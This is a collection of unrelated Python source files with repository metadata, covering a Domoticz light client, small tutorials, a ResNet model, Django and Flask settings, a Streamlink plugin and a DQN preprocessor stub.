        url = 'http://%s/json.htm?type=command&param=switchlight&idx=%s&switchcmd=Set Level&level=%s' % (self.host, _id, level)
        return self._request(url)

    def get_device(self, _id):
        """Return the device dict whose idx matches `_id`, or None."""
        devices = self.list()
        # Bug fix: narrow the old bare `except:` to the lookup errors that
        # actually mean "no such device".
        try:
            return [i for i in devices['result'] if i['idx'] == u'%s' % _id][0]
        except (KeyError, IndexError):
            return None

    def get_light_status(self, _id):
        """Return the dim level (dimmer), 'On'/'Off' status, or an error string."""
        light = self.get_device(_id)
        if light is None:
            return 'No device with that id.'
        if light['SwitchType'] not in self.SWITCH_TYPES:
            return 'Not a light switch'
        elif light['SwitchType'] == self.DIMMER:
            return light['Level']
        elif light['SwitchType'] == self.ON_OFF:
            return light['Status']
if __name__ == '__main__':
    # CLI entry point.  docopt derives the argument parser from the module
    # docstring at the top of this file, so that usage text is load-bearing.
    from docopt import docopt
    from pprint import pprint
    args=docopt(__doc__, version=__version__)
    p=None
    if args['--host']:
        p=Pymoticz(args['--host'])
    else:
        p=Pymoticz()
    if args['list']:
        if args['--names']:
            print('\n'.join(p.list_names()))
        else:
            pprint(p.list())
    elif args['status']:
        response = p.get_light_status(args['<id>'])
        print(response)
    elif args['on']:
        # NOTE(review): the on/off results are never printed, and the `test`
        # command from the usage string has no branch here -- confirm intent.
        response = p.turn_on(args['<id>'])
    elif args['off']:
        response = p.turn_off(args['<id>'])
    elif args['dim']:
        response = p.dim(args['<id>'], args['<level>'])
        print(response)
| [
"eirik.askheim@gmail.com"
] | eirik.askheim@gmail.com |
27f0647ab06a5b9260d9c3e0850850fed952ff92 | e7a9239cbab66ad08e70b4961bbeadfd726cf983 | /org/konghiran/lesson/_00_python_object_and_data_structure_basic/_02_variable_assign.py | 17e0292183e66173a68b2142a9068a9e407895dd | [] | no_license | kidpeterpan/my-python-tutorials | 5a38a33cd5e39bac55b34b4f7d7f7f65a1c1bf96 | 14b89ad01c2b209d2a76ab324ca27867cec5d1c6 | refs/heads/master | 2020-11-24T12:23:27.526993 | 2020-01-10T00:38:27 | 2020-01-10T00:38:27 | 228,141,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py |
# container = value
# dynamic type, no need type declaration
my_dogs = 2
print("value is ", my_dogs)
print("type is ", type(my_dogs)) | [
"zealotkid711@gmail.com"
] | zealotkid711@gmail.com |
7c5b72f5791bf236f67f5a96f18f52171a8fadb4 | 1fdde494b9d5f03be7935e726b810795a1cbd3e9 | /code for comparing with others/permanence_igraph.py | 152a14b0ccd07f9cc0022e2e218c5991a3cfa0ac | [] | no_license | KingofTetris/Permanence-Dynamic-Game | bda83d3a43ec1da8f0c289c85f14cfb5eab338c7 | c8518720a9857799e09e3c7cc4a670ed114d8d82 | refs/heads/master | 2023-03-16T08:16:05.626699 | 2018-05-15T20:11:19 | 2018-05-15T20:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,740 | py | from collections import defaultdict
def permanence_node_igraph(g,clustering,node_v):
'''
This function is used for calculating the permanence of community result w.r.t a vertex.
The input will be igraph classes Graph and VertexClustering,Vertex.
'''
if node_v not in g.vs:
print "There isn't a node %d in the graph" % node_v
return None
community_v = clustering.membership[node_v.index]
"When node_v is in a singleton community, permanence is zero"
if len(clustering[community_v])==1:
return 0
"Initialization for the permanence"
permanence = 0
"neighbor set of node v"
neighbor_list = node_v.neighbors()
degree_v = node_v.degree()
"Initialization the inner edges for each community"
inner_edges = 0
e_max_exist_test = False
for node in neighbor_list:
"Test whether there is external edges"
if node.index not in clustering[community_v]:
e_max_exist_test = True
break
"When E_max=0, permanence of node_v is its clustering coefficient inside the community."
if e_max_exist_test == False:
for node_i in neighbor_list:
for node_j in neighbor_list:
if node_i in node_j.neighbors() or node_j in node_i.neighbors():
inner_edges += 1
"Debug TODO:"
if len(neighbor_list) <= 2:
"The nodes in community is less than 2, clustering is 0"
"Debug: TODO:"
clustering_coefficient = 1
"clustering_coefficient = 0"
else:
"Otherwise, do computation"
clustering_coefficient = inner_edges /float( len(neighbor_list) * (len(neighbor_list)-1) )
permanence = clustering_coefficient
else:
"When E_max != 0"
"The nodes inside the community and neighboring node_v"
inner_node_list = []
external_node_list = []
for node in neighbor_list:
if node.index in clustering[community_v]:
inner_node_list.append(node)
else:
external_node_list.append(node)
community_number_dict = defaultdict(lambda: 0)
for node_e in external_node_list:
community_number_dict[clustering.membership[node_e.index]] += 1
e_max = max(community_number_dict.itervalues())
"When the number of neighboring nodes is less than two, the clustering coefficient is zero"
"TODO:debug"
if len(inner_node_list) <= 2 and len(inner_node_list)>len(external_node_list):
clustering_coefficient = 1
elif len(inner_node_list) <= 2:
clustering_coefficient = 0
else:
"Otherwise, compute the clustering coefficient"
for node_i in inner_node_list:
for node_j in inner_node_list:
if node_i in node_j.neighbors() or node_j in node_i.neighbors():
inner_edges += 1
clustering_coefficient = inner_edges /float( len(inner_node_list) * (len(inner_node_list)-1) )
permanence = len(inner_node_list) / float(e_max * degree_v) - 1 + clustering_coefficient
"""
print "Emax=",e_max,"degree_v=",degree_v,"inner_node=",len(inner_node_list),"clusteringcoe=",clustering_coefficient
"""
return permanence
def permanence_igraph(g,clustering):
'''
This function is used for calculating the permanence of community result.
The input will be igraph classes Graph and VertexClustering.
'''
permanence_sum = 0
for node_v in g.vs:
permanence_sum += permanence_node_igraph(g,clustering,node_v)
return permanence_sum / float(g.vcount()) | [
"fei.jiang1989@gmail.com"
] | fei.jiang1989@gmail.com |
5cf300d98689ea5070ebed56ea833ea47e67eb59 | 9d46c736618aa2637905537571991b2733fb45ff | /Machine learning/best-fit-line.py | e0279b2654ed923ab8d97a13a39a426dd539d3e4 | [] | no_license | rajankumar549/python-lab | be9192d07ad4e791486fdccc891420ccbde7c534 | b841b71ba5a70612e6ea5feb653a5f4d3949f8f3 | refs/heads/master | 2021-01-18T16:57:07.300628 | 2017-08-16T10:27:11 | 2017-08-16T10:27:11 | 100,477,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 715 | py | from statistics import mean
import matplotlib.pyplot as plt
import numpy as num
def get_slope(xs,ys):
    """Ordinary least-squares fit: return (m, b) for y ~ m*x + b."""
    x_mean = mean(xs)
    y_mean = mean(ys)
    # Closed form: m = (E[x]E[y] - E[xy]) / (E[x]^2 - E[x^2])
    m = (x_mean * y_mean - mean(xs * ys)) / (x_mean ** 2 - mean(xs ** 2))
    b = y_mean - m * x_mean
    return m, b
if __name__=='__main__':
    # Demo: fit a line to six sample points, plot data + fit + a prediction.
    xs=[1,2,3,4,5,6]
    ys=[5,4,6,5,6,7]
    plt.style.use('fivethirtyeight')
    xs= num.array(xs,dtype=num.float64)
    ys = num.array(ys, dtype=num.float64)
    m,b=get_slope(xs,ys)
    reg_line=[m*x+b for x in xs]
    plt.scatter(xs, ys,color='black')
    plt.plot(xs,reg_line,color='blue')
    # Predict y at x=8 and mark it in red.
    predicat_x=8
    predicat_y=(m*predicat_x)+b
    plt.scatter(predicat_x,predicat_y,color='red')
    # plt.show()
    # NOTE(review): plt.show() is commented out, so nothing is displayed;
    # only the slope and intercept are printed.
    print(m)
    print(b)
    #plt.scatter(xs, ys)
    #plt.show()
| [
"rajankumar549@gmail.com"
] | rajankumar549@gmail.com |
0f10998dfce475ee752d0584a54d59b17aa336f5 | 1e8b6d1795ffb21029f79aa37ea51c8166aa76fc | /src/resnet.py | 3696e9db6bb77cf05de90276827296789cda7125 | [] | no_license | sinat-jiang/VerificationCodeIdentification | eee309f9656f78492a37026c964cd0fa1da9bdc5 | 86eba7dff1b5733cd54a51843facc1574d29c9ba | refs/heads/master | 2023-04-13T17:43:48.775529 | 2019-12-13T11:05:41 | 2019-12-13T11:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,869 | py | """
resnet 结构网络在当前分类任务中的定制版本
"""
# 实现 ResNet 的基本模块
import torch
from torch import nn
from torch.nn import functional as F
# ResNet 中的基本残差单元
# 通过这里可以看出 pytorch 中允许自定义一个网络子模块,然后指定其 forward 方法,最后可以在主网络中添加该子模块
class ResBlk(nn.Module):
    """Basic ResNet residual block: two 3x3 convs plus a shortcut branch."""
    def __init__(self, ch_in, ch_out, stride=1):
        super(ResBlk, self).__init__()
        # With stride=2 the first conv roughly halves the spatial size.
        self.conv1 = nn.Conv2d(ch_in, ch_out, kernel_size=3, stride=stride, padding=1)
        self.bn1 = nn.BatchNorm2d(ch_out)  # batch normalization
        # kernel 3 / stride 1 / padding 1 keeps the spatial size unchanged.
        self.conv2 = nn.Conv2d(ch_out, ch_out, kernel_size=3, stride=1, padding=1)
        self.bn2 = nn.BatchNorm2d(ch_out)
        self.extra = nn.Sequential()
        # Projection shortcut: a 1x1 conv matches both the channel count and
        # the stride of the main path.
        # Bug fix: the original only checked `ch_out != ch_in`, so a block
        # with equal channels but stride > 1 crashed on the element-wise add
        # (the identity shortcut kept the larger spatial size).
        if ch_out != ch_in or stride != 1:
            # [b, ch_in, h, w] -> [b, ch_out, h', w'] with h'/w' downsampled
            self.extra = nn.Sequential(
                nn.Conv2d(ch_in, ch_out, kernel_size=1, stride=stride),
                nn.BatchNorm2d(ch_out)
            )
    def forward(self, x):
        """Return extra(x) + bn2(conv2(relu(bn1(conv1(x)))))."""
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        # element-wise add of shortcut and residual branch
        out = self.extra(x) + out
        return out
class ResNet18(nn.Module):
    """An 18-layer-style ResNet sized for 40x40 RGB inputs."""
    def __init__(self, num_class):
        super(ResNet18, self).__init__()
        # Input crops are h x w = 40 x 40.
        # Stem: [b, 3, 40, 40] => [b, 16, 38, 38]
        self.conv1 = nn.Sequential(
            nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=0),
            nn.BatchNorm2d(16)  # must match the conv output channel count
        )
        # Four stride-2 residual blocks (kernel_size=3, padding=1); each
        # roughly halves the spatial size: 38 -> 19 -> 10 -> 5 -> 3.
        self.blk1 = ResBlk(16, 32, stride=2)
        self.blk2 = ResBlk(32, 64, stride=2)
        self.blk3 = ResBlk(64, 128, stride=2)
        self.blk4 = ResBlk(128, 256, stride=2)
        # Final linear classifier.  The attribute name "liner" (sic) is kept
        # so existing checkpoints/state_dicts still load.
        self.liner = nn.Linear(256*3*3, num_class)
    def forward(self, x):
        x = F.relu(self.conv1(x))
        for block in (self.blk1, self.blk2, self.blk3, self.blk4):
            x = block(x)
        # Flatten to [b, 256*3*3] and classify.
        x = x.view(x.size(0), -1)
        return self.liner(x)
def main():
    # Smoke-test ResBlk: only the channel count changes here.
    block = ResBlk(ch_in=64, ch_out=128)
    block_out = block(torch.randn(2, 64, 40, 40))
    print('block:', block_out.shape)
    # Smoke-test ResNet18 end to end with 62 output classes.
    net = ResNet18(62)
    net_out = net(torch.randn(2, 3, 40, 40))
    print("resnet:", net_out.shape)
    # Report the total number of parameter elements in the model.
    total_params = sum(weight.numel() for weight in net.parameters())
    print("parameters size:", total_params)
if __name__ == '__main__':
    main()
| [
"jiangbiao0903@163.com"
] | jiangbiao0903@163.com |
86a5818d0043a344ae72b4203da03fb978aebf6c | 457ac5574b7c2c2022664d29956675c5fb0d74fe | /Problems/Yearly income/task.py | 9560acb39f6d94224d521d27a7b91042b4f25524 | [] | no_license | UlyanaLes/hyperskill_Rock_Paper_Scissors | 5d273a22a8fef33f3795a027e33163f2c5e174d5 | beddbb227733a11d512f01f577811590f96fd5b2 | refs/heads/master | 2022-09-26T05:37:00.180658 | 2020-06-03T20:03:09 | 2020-06-03T20:03:09 | 269,172,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | # write your code here
with open('salary.txt', 'r') as infile, \
        open('salary_year.txt', 'w', encoding='utf-8') as outfile:
    # One monthly salary per input line; emit the yearly amount per line.
    for monthly in infile:
        outfile.write(str(int(monthly) * 12) + '\n')
| [
"ulles91@gmail.com"
] | ulles91@gmail.com |
220ed672271890003ae733c18575bbbb6bd7e81f | 8cdbfe5e78efde3e3020773ea367daf4430becf8 | /user_activity_anomaly/knn.py | eb2b1b0e9261b05760a78bde477d7dbc08c60eb1 | [] | no_license | NatarajanLalgudi/machine-learning-example- | 6358ea294506fd52ad9574cb64b0b82798e65e43 | a0f4071d83df5b3fac27b1eadb4379800775c8a7 | refs/heads/master | 2023-04-07T14:54:35.110161 | 2020-04-02T15:10:53 | 2020-04-02T15:10:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from sklearn.model_selection import train_test_split
import pandas as pd
import joblib
import matplotlib.pyplot as plt
# Load labelled benign/malicious user-activity samples and stack them into
# a single training frame.
df1 = pd.read_csv("D:\\OneDrive\\Machine Learning Reference\\user_good.csv")
df2 = pd.read_csv("D:\\OneDrive\\Machine Learning Reference\\user_bad.csv")
df = pd.concat([df1,df2])
# Feature columns fed to the classifier; 'tag' is the label column
# (presumably 0 = Normal, 1 = Malicious per targetname below -- confirm).
feature_cols = ['isnewuser','isnewip','isvpn','islan','percent','src_ip_c']
X = df[feature_cols]
y = df['tag']
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.4)
# Sweep K from 1 to 25, recording the F1 score for each setting and
# printing the per-K classification report and confusion matrix.
k_range= range(1,26)
scores = []
for k in k_range:
    knn = KNeighborsClassifier(n_neighbors=k)
    knn.fit(X_train, y_train)
    y_pred = knn.predict(X_test)
    scores.append(metrics.f1_score(y_test, y_pred))
    targetname = ['Normal','Malicious']
    result = metrics.classification_report(y_test,y_pred,target_names=targetname)
    matrix = metrics.confusion_matrix(y_test, y_pred, labels = [0,1])
    print ('Currently running K:' + str(k))
    print (result)
    print (matrix)
# Plot F1 against K to pick the best neighbour count.
plt.plot(k_range, scores)
plt.xlabel('Value of K for KNN')
plt.ylabel('Testing F1-Score')
plt.show()
| [
"noreply@github.com"
] | NatarajanLalgudi.noreply@github.com |
fc9dd45534fb6b6e55d49c2ab5ed2c5cc4fdbff6 | 1274a505e78d4daa756bdd28bb04edb65ae3317d | /app.py | 2720f54de3ff8f38b187aef4d752960bec1bd7ee | [] | no_license | Deretaz/ImageScreensaver | 34cb59f1454e0aaf90d89736dc54f2f5cac75876 | 275693a15aa0a7d9a2e464bb5f67120c4cbcb8e4 | refs/heads/master | 2022-01-18T02:31:35.842948 | 2019-07-06T17:36:20 | 2019-07-06T17:36:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,898 | py | import sys
import os
import pygame
import random
import time
import glob
from PIL import Image
from win32.win32api import GetSystemMetrics
def main():
    """Run the image-slideshow screensaver until a QUIT event or ESC.

    Shows random JPEGs from the local ``image/`` directory at random
    offsets, and periodically fades the screen to a random colour.
    """
    # Center the Screen
    os.environ['SDL_VIDEO_CENTERED'] = '1'
    # Get screen resolution
    screen_resolution = [int(GetSystemMetrics(0)), int(GetSystemMetrics(1))]
    screen_offset = [0, 0]
    # Reset screen after 300 Images drawn
    screen_reset = 300
    # Read jpg images from the /image direcotry
    # NOTE(review): if the directory is empty, random.randrange(0) below
    # raises ValueError -- consider guarding against an empty image_list.
    image_list = []
    for image_file in glob.glob("image/*.jpg"):
        image_list.append(image_file)
    # Initialize PygGame
    pygame.init()
    screen = pygame.display.set_mode(screen_resolution, pygame.NOFRAME)
    pygame.display.set_caption("Screensaver Image")
    pygame.mouse.set_visible(False)
    # Initialize Clock
    clock = pygame.time.Clock()
    # Set first screen background
    screen.fill((0, 136, 255))
    running = True
    while running:
        # Limit FPS to 4
        clock.tick(4)
        # Check for reset fill screen
        screen_reset -= 1
        if screen_reset <= 0:
            # Draw a rect over all to make a blur effect
            blur_surface = pygame.Surface((screen_resolution[0], screen_resolution[1]))
            blur_color = ((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))
            # Ramp the overlay alpha to fade the old images out gradually.
            for alpha in range(100):
                blur_surface.set_alpha(alpha)
                blur_surface.fill(blur_color)
                screen.blit(blur_surface, (0, 0))
                pygame.display.flip()
            screen_reset = 300
        # Select Random Image from List
        image_index = random.randrange(len(image_list))
        # Load Image per Pygame.Image.Load
        image_py_loaded = pygame.image.load(image_list[image_index])
        image_py_rect = image_py_loaded.get_rect()
        # Allow Pictures to be offset to top, left, right and bottom
        screen_offset[0] = random.randint(-100, screen_resolution[0] - image_py_rect[2] + 100)
        screen_offset[1] = random.randint(-100, screen_resolution[1] - image_py_rect[3] + 100)
        # Set Random x and y position of the image
        image_py_rect[0] = screen_offset[0]
        image_py_rect[1] = screen_offset[1]
        # Draw image to screen
        screen.blit(image_py_loaded, image_py_rect)
        # Display screen content
        pygame.display.flip()
        ### For closing the window # Don't change anything beyond this line ###
        for event in pygame.event.get():
            # Close game if a pygame.QUIT event is in queue
            if event.type == pygame.QUIT:
                running = False
            # Close game if ESC is pressed
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    pygame.event.post(pygame.event.Event(pygame.QUIT))
if __name__ == '__main__':
    main()
| [
"benjamin.sobe@codersgen.de"
] | benjamin.sobe@codersgen.de |
520e94135de20c0dd4494037fc3290ebd531396f | 9a72d97ec915829889ccc29c02f37d3672d363a5 | /CcloudTv.bundle/Contents/Libraries/Shared/streamlink/plugins/speedrunslive.py | feb1df0e5f78bdb03bffbc19a1347075ab7faefb | [] | no_license | alex-alex2006hw/plex-plug-ins | 64a63ddfb8b990a2499b62247a3a5824515339fb | 4d2e7be53dfffb02666ff2791fc0bc94cd6b396d | refs/heads/master | 2021-04-09T17:18:24.619889 | 2018-03-18T22:25:16 | 2018-03-18T22:25:16 | 125,717,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | import re
from streamlink.plugin import Plugin
TWITCH_URL_FORMAT = "http://www.twitch.tv/{0}"

# Raw string avoids the invalid "\w" escape (deprecated, a future
# SyntaxError); the domain dot is now escaped so e.g. "speedrunsliveXcom"
# no longer matches.
_url_re = re.compile(r"http://(?:www\.)?speedrunslive\.com/#!/(?P<user>\w+)")


class SpeedRunsLive(Plugin):
    """Streamlink plugin that resolves a SpeedRunsLive channel page to the
    Twitch stream of the same user name."""

    @classmethod
    def can_handle_url(cls, url):
        """Return a truthy match object when *url* is a SpeedRunsLive channel.

        First parameter renamed ``cls`` -- this is a classmethod, so the
        original ``self`` name was misleading.
        """
        return _url_re.match(url)

    def _get_streams(self):
        # A SpeedRunsLive channel is a re-branded Twitch channel, so extract
        # the user name and delegate to the Twitch plugin via the session.
        match = _url_re.match(self.url)
        username = match.group("user")
        url = TWITCH_URL_FORMAT.format(username)
        return self.session.streams(url)


__plugin__ = SpeedRunsLive
| [
"alex2006hw@gmail.com"
] | alex2006hw@gmail.com |
e0bd3ed5653ee04033e69979c01df42beabf0916 | 2e0a4d35ef1d42523ec7d76f85a1b57002a2562e | /Python3.5/Head first Exercise/Exercise/webapp/cgi-bin/initdbtimingdata.py | 0c6ad0d0ee1819e675ef342d26beccfef5fe1730 | [] | no_license | starVader/Python | de7b930346f996181d8bf4f5eec37ffba5a2736b | 347b2289c86ffafab19681ddbc990064b6e13fe0 | refs/heads/master | 2021-01-10T03:42:57.589362 | 2016-02-17T05:19:41 | 2016-02-17T05:19:41 | 48,681,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import sqlite3
import glob

# Project module; it was referenced below but never imported (NameError).
import athletemodel

# The module imported at the top of this file is "sqlite3"; the bare name
# "sqlite" was undefined.
connection = sqlite3.connect('coach.sqlite')
cursor = connection.cursor()

data_files = glob.glob("../data/*.txt")
athletes = athletemodel.put_to_store(data_files)

for name in athletes:
    # Insert one row per recorded time.  The original code assigned "time"
    # but read the undefined name "times" (NameError), used the invalid SQL
    # keyword VALUE instead of VALUES, and passed a bare value where sqlite3
    # expects a parameter sequence.
    # NOTE(review): assumes .times is an iterable of individual time values;
    # confirm against athletemodel's AthleteList definition.
    for each_time in athletes[name].times:
        cursor.execute("INSERT INTO timing_data(times) VALUES (?)",
                       (each_time,))

connection.commit()
connection.close()
"starvader473@gmail.com"
] | starvader473@gmail.com |
d9e6bf00ca6abe565d935cf41b72703f7ac8a861 | 8370b4ae01178a5e28460ff27f4a9a0065b5745f | /config.py | 0a18d7ca43cceaf7ca0336b1da55e6aee5560147 | [] | no_license | peindunk/hardcore_tv | 1ace823b6c33c2db92396a34474f8432aeead879 | 9184d9539b4fbee72461f3a702a872424fd27254 | refs/heads/master | 2022-12-10T01:34:14.425308 | 2019-01-21T01:15:41 | 2019-01-21T01:15:41 | 161,636,491 | 0 | 0 | null | 2022-12-08T01:20:15 | 2018-12-13T12:32:27 | JavaScript | UTF-8 | Python | false | false | 639 | py | # -*- coding:utf-8 -*-
'''Site-wide constants for the hardcore_tv streaming site.

Reference: https://www.jianshu.com/p/7e16877757f8
'''
# Base RTMP URL of the zhanqi.tv CDN; presumably a channel id is appended to
# form the full live-stream address -- confirm against the player code.
zq_api = "rtmp://txrtmp.cdn.zhanqi.tv/zqlive/"
# NOTE(review): hard-coded Flask secret key checked into source control;
# should be loaded from the environment in production.
SECRET_KEY = 'hardcore_tv'
# Channel category labels (Chinese, rendered to users verbatim):
# PC games, console games, mobile games, and entertainment respectively.
pcgame = ['英雄联盟','DNF','绝地求生','魔兽世界','DOTA2',\
'梦三国2','守望先锋','三国杀','梦幻西游','传奇','暴雪游戏']
videoGame = ['主机游戏','火影忍者']
mobileGame = ['CF手游','热门手游','王者荣耀','吃鸡手游','第五人格','狼人杀']
entertainment = ['百变娱乐','游戏放映室']
# User-facing notices (runtime strings, embedded HTML left exactly as-is):
# "logged out, returning to home page" / "login successful, returning home".
notice_quit = '''您已退出当前账号... < br >
即将为您返回主页...'''
notice_login = '''登录成功 即将返回主页'''
"413447197@qq.com"
] | 413447197@qq.com |
9f164b011736f56f17f02abad61284630861b3ce | e9b7d1c8fe62a9cc0f96141b13902d95ca736baf | /django/mysite/mysite/settings.py | 4397713e968d26dfb596b1b30532aec72bc78fd2 | [] | no_license | andybao/daily_work | 26d5aee8b47b898cd6672afa927827ede789548d | b71850fbe978ed1ce2945a7d55d5dea6fbd13483 | refs/heads/master | 2022-12-22T04:13:21.701101 | 2020-04-12T13:54:23 | 2020-04-12T13:54:23 | 184,680,151 | 0 | 0 | null | 2022-12-11T01:24:59 | 2019-05-03T00:59:46 | Python | UTF-8 | Python | false | false | 3,294 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# SECURITY: secrets are read from the environment when available.  The
# literal fallbacks preserve the previous behavior for local development,
# but must not be relied upon in production.
SECRET_KEY = os.environ.get(
    'DJANGO_SECRET_KEY',
    'y_aqfd137-_aba)u1)i8%9lvu$!b74@(*z^z=b(3a2c+l(r@w_',
)

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'polls.apps.PollsConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'


# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Default backend is PostgreSQL; a secondary SQLite alias is kept for local
# use.  Credentials were previously hard-coded in source; they now come from
# the environment with the old values as fallbacks (same defaults, so
# behavior is unchanged when the variables are unset).

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'hisdb',
        'USER': os.environ.get('DB_USER', 'auto_tester@chainvu.com'),
        'PASSWORD': os.environ.get('DB_PASSWORD', 'dysan200'),
    },
    'sqlite': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'
| [
"wenyu.bao@gmail.com"
] | wenyu.bao@gmail.com |
77b43d7d9cd6b912bcee471c564b47d7a7cdd552 | 63944fb28b938e30ca5c831edce8bd2d643aaef6 | /forms.py | f3a30f3222b762ce75ea2c2eb55a4caabe9b859d | [] | no_license | Saptak625/BoldifyAWSPipline | 35cf76a83dcb4730b031a434b45abf3aac9a56b4 | f35bed14307f2dcc71daf0882ded6af5eb3748b9 | refs/heads/main | 2023-06-06T21:30:56.036420 | 2021-07-01T16:51:02 | 2021-07-01T16:51:02 | 382,098,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_ckeditor import CKEditorField
class BoldifyEncryptForm(FlaskForm):
    """Input form for the Boldify encryption page.

    Fields:
        boldMessage: required free-text input holding the bolded message.
        submit: submit button.

    Note: ``Length`` and ``CKEditorField`` are imported at module level but
    unused by this form.
    """
    boldMessage = StringField('Bolded Message: ',
                              validators=[DataRequired()])
    submit = SubmitField('Submit')
"24sdas@student.dasd.org"
] | 24sdas@student.dasd.org |
f1f4be0600c0a96312d2b00339681c2c5efff41b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_cackles.py | b56545b1c6dceb5e279e87bc0ba44c4f57263de2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _CACKLES():
def __init__(self,):
self.name = "CACKLES"
self.definitions = cackle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['cackle']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
0f7ddbc55809f101e6c51e745fc682ec6439b74a | edbf8601ae771031ad8ab27b19c2bf450ca7df76 | /283-Move-Zeroes/MoveZeroes.py | b7e24b42230eae378975aceeeb96569feb6628fa | [] | no_license | gxwangdi/Leetcode | ec619fba272a29ebf8b8c7f0038aefd747ccf44a | 29c4c703d18c6ff2e16b9f912210399be427c1e8 | refs/heads/master | 2022-07-02T22:08:32.556252 | 2022-06-21T16:58:28 | 2022-06-21T16:58:28 | 54,813,467 | 3 | 2 | null | 2022-06-21T16:58:29 | 2016-03-27T05:02:36 | Java | UTF-8 | Python | false | false | 548 | py | class Solution(object):
def moveZeroes(self, nums):
    """Move every zero in *nums* to the end, in place, keeping the
    relative order of the non-zero elements.

    :type nums: List[int]
    :rtype: None -- *nums* is modified in place, nothing is returned.
    """
    if not nums or len(nums) < 2:
        return
    # First pass: compact every non-zero value toward the front.  The
    # write cursor never passes the read position, so overwriting while
    # iterating is safe.
    write = 0
    for value in nums:
        if value != 0:
            nums[write] = value
            write += 1
    # Second pass: zero-fill whatever remains past the compacted prefix.
    for tail in range(write, len(nums)):
        nums[tail] = 0
| [
"gxwangdi@gmail.com"
] | gxwangdi@gmail.com |
d00e8228569d9fb43bc734b6edf4821d25af7ce6 | 640e7bc10ceaf1343327feb8b7b6f83fc1f0be60 | /deeprl_hw2/preprocessors.py | fbef69beca884d71e21f96e5ab0deb6ccab6de12 | [] | no_license | MightyChaos/deepRL_DQN | b2d19201610ac3671060ce9841f643c1c20c0ab1 | 70484095c3b71d893678a43e1d0aed4716811a79 | refs/heads/master | 2021-01-23T01:01:31.522798 | 2017-03-30T02:40:18 | 2017-03-30T02:40:18 | 85,863,284 | 0 | 0 | null | 2017-03-22T18:37:02 | 2017-03-22T18:37:02 | null | UTF-8 | Python | false | false | 6,198 | py | """Suggested Preprocessors."""
import numpy as np
from PIL import Image
from deeprl_hw2 import utils
from deeprl_hw2.core import Preprocessor
from collections import deque
class HistoryPreprocessor(Preprocessor):
    """Keeps the last k states.

    Useful for domains where you need velocities, but the state
    contains only positions.

    When the environment starts, this will just fill the initial
    sequence values with zeros k times.

    Parameters
    ----------
    history_length: int
        Number of previous states to prepend to state being processed.
